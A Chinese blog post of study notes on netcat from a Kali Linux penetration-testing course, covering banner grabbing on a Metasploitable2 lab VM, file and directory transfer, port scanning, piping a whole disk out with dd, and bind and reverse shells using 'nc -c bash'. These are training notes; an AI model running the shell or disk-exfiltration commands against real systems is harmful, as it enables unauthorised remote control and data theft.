kali linux 滲透測試第五章 netcat--nc

阿新 • • 發佈：2019-02-07

繼續記筆記～～～

有了netcat，可以不用telnet了
nc的作用：
偵聽模式 / 傳輸模式
telnet / 獲取banner資訊
傳輸文字資訊
傳輸檔案/目錄
加密傳輸文檔案
遠端控制/木木⻢馬
加密所有流量
流媒體伺服器
遠端克隆硬碟

-v:顯示詳細的連線資訊（輸出內容）
-n:不會進行DNS解析

例如nc 隔壁伺服器metasploitable2的域名

root@quedgee:~# nc -vn 172.16.43.139 80
(UNKNOWN) [172.16.43.139] 80 (http) open

當輸入head，則返回標頭檔案

[email protected] 
:~# nc -vn 172.16.43.139 80
(UNKNOWN) [172.16.43.139] 80 (http) open
head
<html><head><title>Metasploitable2 - Linux</title></head><body>
<pre>

                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


</pre 
>
<ul>
<li><a href="/twiki/">TWiki</a></li>
<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>
<li><a href="/mutillidae/">Mutillidae</a></li>
<li><a href="/dvwa/">DVWA</a></li>
<li><a href="/dav/">WebDAV</a 
></li>
</ul>
</body>
</html>

若要實現“聊天”功能，在兩臺機器上使用與演示：
A（伺服器）：先要開放（偵聽）一個埠
B（客戶）：作為客戶端連線，產生tcp的連線
(333代指某一個埠)
A：nc -l -p 333
B：nc -vn 1.1.1.1 333

在伺服器端 nc -l -p 333 開啟後，可以用以下命令檢視333埠是否開啟

root@quedgee:~# netstat -pantu | grep 333
tcp        0      0 0.0.0.0:333             0.0.0.0:*               LISTEN      3730/nc

發現是LISIEN的，於是可以在另一臺機子（客戶）上使用

root@quedgee:~# nc -vn 192.168.153.141 333
(UNKNOWN) [192.168.153.141] 333 (?) open

於是可以開始進行通訊了
客戶端輸入hello，伺服器端收到並返回個what
客戶端：

root@quedgee:~# nc -vn 192.168.153.141 334
(UNKNOWN) [192.168.153.141] 334 (?) open
hello
what?

伺服器端：

root@quedgee:~# nc -l -p 334
hello
what?

通過這些功能實現電子取證
比方我想在客戶端傳輸檔案

root@quedgee:~# ls -l | nc -vn 192.168.153.141 335
(UNKNOWN) [192.168.153.141] 335 (?) open

伺服器端會有（條件是伺服器端得先開啟埠偵聽）

root@quedgee:~# nc -l -p 335
總用量 4540
-rw------- 1 root root 5578752 10月 21 21:28 core
drwxr-xr-x 2 root root    4096 10月 21 21:34 Desktop
drwxr-xr-x 3 root root    4096 11月  7 18:42 Documents
drwxr-xr-x 2 root root    4096 10月 22 13:17 Downloads
drwxr-xr-x 2 root root    4096 4月  22  2017 Music
drwxr-xr-x 2 root root    4096 10月 21 21:33 Pictures
drwxr-xr-x 2 root root    4096 4月  22  2017 Public
drwxr-xr-x 2 root root    4096 4月  22  2017 Templates
drwxr-xr-x 2 root root    4096 4月  22  2017 Videos

如果我想把客戶端的程序資訊傳輸到伺服器端
客戶端：（-q 1 的意思是等一秒鐘自動斷開連線，表示已經完成）

root@quedgee:~# ps aux | nc -nv 192.168.153.141 333 -q 1
(UNKNOWN) [192.168.153.141] 333 (?) open

此時伺服器端已經生成了ps.txt

root@quedgee:~# nc -l -p 333 > ps.txt
root@quedgee:~# ls
core  Desktop  Documents  Downloads  Music  Pictures  ps.txt  Public  Templates  Videos

傳輸檔案
A：nc -lp 333 > 1mp4(如同一個可上傳檔案的ftp伺服器)
B：nc -vn 192.168.153.141 333 < 1.mp4 -q 1

傳輸端B

root@quedgee:~/Desktop# nc -vn 192.168.153.141 333 < 1.mp4 -q 1
(UNKNOWN) [192.168.153.141] 333 (?) open

接收端A

root@quedgee:~# nc -lp 333 > 1.mp4
root@quedgee:~# ls
1.mp4  Desktop    Downloads  Music     ps.txt  Templates
core   Documents  lsof.txt   Pictures  Public  Videos

接收端和傳輸端的角色可以互相轉換，倘若伺服器端開了埠並作為傳輸端，相當於是開了埠，等著有人來連線，一連線內容便流到客戶端

root@quedgee:~# nc -lp 333 < 1.mp4

root@quedgee:~/Desktop# nc -vn 192.168.153.141 333 > a.mp4 -q 1
(UNKNOWN) [192.168.153.141] 333 (?) open

客戶端一連線，就把伺服器端的1.mp4，儲存為a.mp4

傳輸目錄

A:tar -cvf - music/ | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf –

具體思路：伺服器端把music目錄打包後的結果傳到管道里，客戶端收到後解包
伺服器端：

[email protected]:~/Desktop# tar -cvf - music/ | nc -lp 333 -q 1
music/
music/a.mp4
music/1.mp4

客戶端：

[email protected]:~# nc -vn 192.168.153.141 333 | tar xvf -
(UNKNOWN) [192.168.153.141] 333 (?) open
music/
music/a.mp4
music/1.mp4
[email protected]:~# ls
1.mp4 Desktop Downloads music Pictures Public Videos
core Documents lsof.txt Music ps.txt Templates
[email protected]:~# cd music
[email protected]:~/music# ls -l
總用量 8
-rw-r–r– 1 root root 3 11月 7 21:26 1.mp4
-rw-r–r– 1 root root 3 11月 7 21:30 a.mp4

加密檔案傳輸：
和傳輸目錄的思想類似，例子是對稱加密演算法
在A 端解密，在B端加密

A:nc -lp 333 | mcrypt –flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt –flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

流媒體傳輸

A：cat 1.mp4 | nc -lp 333
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

伺服器端把1.mp4以流的形式一點一點“流進”客戶端
其中mplayer需要在kali上安裝

NC-埠掃描

z：埠掃描（探測tcp的埠）
加上 -u：可以看所有UDP的埠
比方說看自己的埠開啟狀態

root@quedgee:~# nc -vnz 192.168.153.141 1-100
(UNKNOWN) [192.168.153.141] 80 (http) open

nc的掃描功能只有-z，掃描功能不如nmap那麼全面

NC——遠端克隆硬碟
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
遠端電子子取證,可以將目標伺服器硬碟遠端複製,或者記憶體。
通過這種方法，拷貝的檔案的一模一樣
dd命令可以實現塊（硬碟）級別的複製
B端為被取證端，A端為接收端，相當於把B端的東西備份到A端

NC遠端控制
windows下是通過開啟本機的3389遠端桌面的埠，對伺服器進行遠端管理

正向:
• A:nc -lp 333 -c bash
• B:nc 1.1.1.1 333
反向:
• A:nc -lp 333
• B:nc 1.1.1.1 333 -c bash
• 注:Windows用使用者把bash改成cmd;

A 端（伺服器）先偵聽333埠，-c命令實現遠端控制，等著有人來連。連上後，通過在客戶端就可以檢視伺服器端的內容，比如ls，或者輸入 init6 命令重啟。

kali linux 滲透測試第五章 netcat--nc

kali linux 滲透測試第五章 netcat--nc

【安全牛學習筆記】Kali Linux滲透測試方法

kali linux滲透測試——信息收集

性能測試第五章-Loadrunner亂碼解決方法

Linux效能優化第五章效能工具：特定程序記憶體

Kali Linux 滲透測試：掃描漏洞

Kali linux滲透測試系列————28、Kali linux 滲透攻擊之社會工程學攻擊

Kali Linux 滲透測試手冊（1.1）安裝虛擬機器

【安全牛學習筆記】Kali Linux滲透測試介紹

Kali linux滲透測試系列————23、Kali linux 滲透攻擊之伺服器端攻擊

Kali Linux滲透測試 021 主動資訊收集

Kali Linux滲透測試 101 手動漏洞挖掘-CSRF 漏洞

Kali linux滲透測試系列————12、Kali linux資訊收集之作業系統識別

Kali Linux滲透測試 045 讀取windows本地密碼

Kali linux滲透測試（一）

【安全牛學習筆記】Kali Linux滲透測試介紹

Kali Linux滲透測試 049 清除痕跡

Kali linux滲透測試系列————34、Kali linux 維持訪問之建立Web後門

Kali linux滲透測試系列————13、Kali linux資訊收集之埠掃描

我的Kali Linux滲透測試學習之路

kali linux 滲透測試 第五章 netcat--nc

相關推薦

kali linux 滲透測試第五章 netcat--nc